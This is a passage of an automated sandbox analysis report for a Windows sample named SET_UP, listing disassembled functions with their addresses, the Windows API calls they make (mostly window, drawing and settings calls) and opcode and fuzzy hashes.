                                                                                                                                                                                                  • Instruction Fuzzy Hash: E801F5313003047FE624BB29DC06FBEB759EB84718F50062DF652662D1CFA628148769
                                                                                                                                                                                                  Function 00431285 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 0043128A
                                                                                                                                                                                                  • GetSysColor.USER32(00000012), ref: 004312F9
                                                                                                                                                                                                  • GetSysColor.USER32(00000012), ref: 00431300
                                                                                                                                                                                                  • GetSysColor.USER32(00000012), ref: 00431307
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Color$H_prolog
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3000748305-0
                                                                                                                                                                                                  • Opcode ID: 18d19d943a79564bdc10385ecf78686cb974acb181aa2fd274c982cff516bc5d
                                                                                                                                                                                                  • Instruction ID: dd28277c65d90fd8287f1515e4ba46916afc24d2dceae50bb25c2e5c4b811928
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 18d19d943a79564bdc10385ecf78686cb974acb181aa2fd274c982cff516bc5d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9D1126B0901204DFCB54DF6AC881689FFE8FF55314B1082ABED189F296D3B59900CF90
                                                                                                                                                                                                  Function 004AC311 Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetWindow.USER32(?,00000005), ref: 004AC333
                                                                                                                                                                                                  • GetWindow.USER32(00000000,00000005), ref: 004AC34F
                                                                                                                                                                                                  • GetWindow.USER32(00000000,00000002), ref: 004AC365
                                                                                                                                                                                                  • GetWindow.USER32(00000000,00000002), ref: 004AC370
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Window
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2353593579-0
                                                                                                                                                                                                  • Opcode ID: d2ac013020d1d9304cd6380cc213eb497f8117324320f08473f8196bb58f6e36
                                                                                                                                                                                                  • Instruction ID: 4da0970acc80ee04cfaec52dab00f28062ebbd4a4fd2b12074e09b71a6de90f9
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d2ac013020d1d9304cd6380cc213eb497f8117324320f08473f8196bb58f6e36
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A9F0F46734430526C66162AA2CC6F6F7B9C8BF3F51F00403AFA00A6282FE55C805433D
                                                                                                                                                                                                  Function 004AC401 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetWindow.USER32(?,00000005), ref: 004AC435
                                                                                                                                                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 004AC442
                                                                                                                                                                                                  • SetTextColor.GDI32(?,?), ref: 004AC45F
                                                                                                                                                                                                  • SetBkColor.GDI32(?,?), ref: 004AC46D
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ColorWindow$LongText
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3945788684-0
                                                                                                                                                                                                  • Opcode ID: 79935f47699c6dc4f4f775fa1cdbbccae6f8e20c686b989f918f2e35ce913579
                                                                                                                                                                                                  • Instruction ID: 5244a2c9001e7e4c245fc531c17326d3ff312077aa8997fc67d10e0a0b47ae78
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 79935f47699c6dc4f4f775fa1cdbbccae6f8e20c686b989f918f2e35ce913579
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C80147362092109BCBA1C764FCC8DEF7B59EBBB321B144A2BF441C3190C3199946C3AE
                                                                                                                                                                                                  Function 004107D7 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SendMessageW.USER32(?,00000410,00000000,?), ref: 0041080B
                                                                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00410826
                                                                                                                                                                                                  • SendMessageW.USER32(?,00000401,00000001,00000000), ref: 00410847
                                                                                                                                                                                                  • SendMessageW.USER32(?,00000407,00000000,?), ref: 00410856
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: MessageSend$ClientScreen
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1264711397-0
                                                                                                                                                                                                  • Opcode ID: c0aad7cc3490d21c89511c8868476b49e739af076476050d094219184b09c950
                                                                                                                                                                                                  • Instruction ID: 080bd0b3a7eacc56cb11cc84757ab4e9ee2acc611f1661a7f23b0752989cab4e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c0aad7cc3490d21c89511c8868476b49e739af076476050d094219184b09c950
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 631130B1E00218AFDB04CF95DC45DEF7BB8EB48700F104066EA01B7291D2B1EE51CBA4
                                                                                                                                                                                                  Function 004B0725 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • WindowFromPoint.USER32(?,?), ref: 004B073D
                                                                                                                                                                                                  • GetParent.USER32(00000000), ref: 004B074A
                                                                                                                                                                                                  • ScreenToClient.USER32(00000000,?), ref: 004B076B
                                                                                                                                                                                                  • IsWindowEnabled.USER32(00000000), ref: 004B0784
                                                                                                                                                                                                    • Part of subcall function 004BB9C5: GetWindowLongW.USER32(00000000,000000F0), ref: 004BB9D6
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Window$ClientEnabledFromLongParentPointScreen
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2204725058-0
                                                                                                                                                                                                  • Opcode ID: 54d1a6ddf4956bd32fbe47b586b0b91564bab1ab3381e5158ead58d4bf3eb79f
                                                                                                                                                                                                  • Instruction ID: 5e157fd796d75737bcbba2ba5999b7747e79b2c27fa5d807125c1bbba4034d36
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 54d1a6ddf4956bd32fbe47b586b0b91564bab1ab3381e5158ead58d4bf3eb79f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8A017176600610BF8712AB99DC44DEFBBA9EF99741B14812AF905D3311EF34DD029BA8
                                                                                                                                                                                                  Function 004B41B6 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetDlgItem.USER32(?,?), ref: 004B41C1
                                                                                                                                                                                                  • GetTopWindow.USER32(00000000), ref: 004B41D4
                                                                                                                                                                                                  • GetTopWindow.USER32(?), ref: 004B4204
                                                                                                                                                                                                  • GetWindow.USER32(00000000,00000002), ref: 004B421F
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Window$Item
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 369458955-0
                                                                                                                                                                                                  • Opcode ID: 0a4af17f0be6f12160f056ecb829354f0bd791365ade4561452deee36b7fb693
                                                                                                                                                                                                  • Instruction ID: 71a5bbc8a4f74497482b7b7d86540caa3252a7fbe24a4218089211a0357540dd
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0a4af17f0be6f12160f056ecb829354f0bd791365ade4561452deee36b7fb693
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0401F232501219BBCF226F6A9C05EEF3AA9AFA43D1F044426FC0095212D739CA11A6BD
                                                                                                                                                                                                  Function 004B422F Relevance: 6.0, APIs: 4, Instructions: 49windowCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetTopWindow.USER32(?), ref: 004B423D
                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000000,00000000,00000000), ref: 004B4273
                                                                                                                                                                                                  • GetTopWindow.USER32(00000000), ref: 004B4280
                                                                                                                                                                                                  • GetWindow.USER32(00000000,00000002), ref: 004B429E
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Window$MessageSend
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1496643700-0
                                                                                                                                                                                                  • Opcode ID: 581cc1de6b407bb5b9d4370379e9469a0c2862ac6050fc315e0ebc94ac30c8fe
                                                                                                                                                                                                  • Instruction ID: d29bedf34d2489e70e21fc490da510614472d8a939f784bf7c9cb0505fb6746f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 581cc1de6b407bb5b9d4370379e9469a0c2862ac6050fc315e0ebc94ac30c8fe
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E9012D36001219BBCF165F959D05EDF3B25AF94790F054066F90055121C73AC921FBB9
                                                                                                                                                                                                  Function 004B5BA5 Relevance: 6.0, APIs: 4, Instructions: 48windowCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Item$EnableFocusMenuNextParent
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 988757621-0
                                                                                                                                                                                                  • Opcode ID: 12a280d99a833a5a2257c4b66f0b9a833b33a37a5c52e796bd1740a3623ab554
                                                                                                                                                                                                  • Instruction ID: 080c9486824799606951a15e29b0bbce037747d14595488f942b43dee01f332d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 12a280d99a833a5a2257c4b66f0b9a833b33a37a5c52e796bd1740a3623ab554
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 80115271210B009FDB39AF21DC59F5ABBB5EF54714F104A2EF142465A1DB78F851CB28
                                                                                                                                                                                                  Function 0041421F Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • InvalidateRect.USER32(?,?,00000000,?,000000FF,?,?), ref: 00414261
                                                                                                                                                                                                  • UpdateWindow.USER32(?), ref: 0041426A
                                                                                                                                                                                                  • GetDC.USER32(?), ref: 00414276
                                                                                                                                                                                                    • Part of subcall function 004C0464: SetBkColor.GDI32(A5A5D47D,?), ref: 004C046E
                                                                                                                                                                                                    • Part of subcall function 004C0464: ExtTextOutW.GDI32(A5A5D47D,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 004C0484
                                                                                                                                                                                                  • ReleaseDC.USER32(?,?), ref: 0041429B
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ColorInvalidateRectReleaseTextUpdateWindow
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1832808473-0
                                                                                                                                                                                                  • Opcode ID: c30f01917b760a084ffcff416a1e6129a6413b811ea61578b74a56eb06bf0f74
                                                                                                                                                                                                  • Instruction ID: c34ca7a905355f2b639b16c5bd02e8bb050470ce209b5db82ad60d98df698c5b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c30f01917b760a084ffcff416a1e6129a6413b811ea61578b74a56eb06bf0f74
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B4019231100205EFCF216F62DC08DEB7BB9FF81354B14896BF966911A0D7399891DB69
                                                                                                                                                                                                  Function 004BC31A Relevance: 6.0, APIs: 4, Instructions: 44registryCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RegSetValueExW.ADVAPI32(00000000,?,00000000,00000004,?,00000004,00000001,?,?,0042AF28,Settings,LastLicenseCheck,?,?,?), ref: 004BC346
                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,?,0042AF28,Settings,LastLicenseCheck,?,?,?), ref: 004BC34F
                                                                                                                                                                                                  • wsprintfW.USER32 ref: 004BC36B
                                                                                                                                                                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 004BC384
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ClosePrivateProfileStringValueWritewsprintf
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1902064621-0
                                                                                                                                                                                                  • Opcode ID: 0896c1862b53e5e173d7cdb62790960d7ceef2101c21d26179361e9f8fbc7d53
                                                                                                                                                                                                  • Instruction ID: 44b26edb8e51dc0be4dcf0307bbc0e8ad7f273087ff60c865606b12fe3e7a044
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0896c1862b53e5e173d7cdb62790960d7ceef2101c21d26179361e9f8fbc7d53
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 00016232500214BBDB115FA5DC49FDA37A9BF08715F048526FE12A6160E779D5108BA8
                                                                                                                                                                                                  Function 004B4A37 Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetObjectW.GDI32(00000000,0000000C,?), ref: 004B4A75
                                                                                                                                                                                                  • SetBkColor.GDI32(00000000,00000000), ref: 004B4A81
                                                                                                                                                                                                  • GetSysColor.USER32(00000008), ref: 004B4A91
                                                                                                                                                                                                  • SetTextColor.GDI32(00000000,?), ref: 004B4A9B
                                                                                                                                                                                                    • Part of subcall function 004BB9C5: GetWindowLongW.USER32(00000000,000000F0), ref: 004BB9D6
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Color$LongObjectTextWindow
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2871169696-0
                                                                                                                                                                                                  • Opcode ID: f54d9d9919ec51ec6f03fa183f9438249fdebe1f1faddb27a61a8e666a0ba66c
                                                                                                                                                                                                  • Instruction ID: 40fd051d4876052a271469c35eeb0a2d16f05dce3502f33809585ac71f600045
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f54d9d9919ec51ec6f03fa183f9438249fdebe1f1faddb27a61a8e666a0ba66c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 03014F31140105ABDF219F69DC49FEB3B65AB48750F144522F942C51E2D778C992CA7D
                                                                                                                                                                                                  Function 004C16B9 Relevance: 6.0, APIs: 4, Instructions: 43fileCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SetActiveWindow.USER32(?), ref: 004C16C8
                                                                                                                                                                                                  • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 004C16E3
                                                                                                                                                                                                  • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 004C1705
                                                                                                                                                                                                  • DragFinish.SHELL32(?), ref: 004C171E
                                                                                                                                                                                                  Memory Dump Source
